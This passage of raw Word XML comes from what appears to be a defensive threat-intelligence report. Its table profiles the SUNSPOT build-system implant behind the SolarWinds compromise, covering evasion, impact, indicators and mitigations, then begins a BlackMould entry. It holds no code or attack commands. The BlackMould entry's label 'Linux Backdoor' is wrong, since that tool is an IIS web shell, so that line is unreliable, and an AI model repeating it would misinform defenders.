              </w:rPr>
              <w:t>Used process monitoring, file replacement timing, masquerading, anti-forensics, and cleanup techniques to avoid detection during the software compilation process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4B50D285" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AFAFB94" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0992443F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct credential theft capability documented for SUNSPOT itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2730ADAD" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A9038B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CF9D36C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Monitored build-related processes and development environment activity to identify when software compilation events occurred.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3DCE7D7C" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11839EB7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="016C964B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No dedicated lateral movement functionality publicly documented; operated mainly within compromised development infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4BA2715F" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35B0C767" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59DE990D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>SUNSPOT primarily functioned as an internal build-environment implant and did not rely heavily on traditional external C2 communication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0E27BE33" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E427B3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18D3BDDE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct exfiltration functionality documented.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="5FDDEFE6" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B8681F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7F2C94" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enabled one of the most significant supply-chain attacks ever disclosed by injecting malicious code into trusted SolarWinds Orion software updates distributed to thousands of organizations worldwide.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="01AF004E" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="604924FE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="711D0753" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Unexpected file replacement activity during builds, suspicious Windows services, unauthorized modifications to source files, unusual process monitoring behavior, and anomalous compilation artifacts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4AEB6AA7" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31AB5B45" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D942FC" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Secure software development pipelines, implement build integrity validation, monitor source-code repositories, audit build server activities, use file integrity monitoring (FIM), apply least privilege, and continuously monitor CI/CD infrastructure for anomalous behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="14AE7F7C" w14:textId="77777777" w:rsidTr="00AC4402">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44676FD8" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F3A8FE1" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK SUNSPOT S0562</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft </w:t>
              </w:r>
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Solorigate</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve"> Analysis</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>FireEye SolarWinds Investigation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>CISA SolarWinds Guidance</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D9C2356" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41501D36" w14:textId="5269F3C7" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">BlackMould </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0564</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2"/>
        <w:gridCol w:w="8966"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="14F071AB" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E2664B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F7B36C1" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3A9F2479" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="674561A5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BBFDD71" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>BlackMould (S0564)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Linux Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="5062D13B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06470982" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
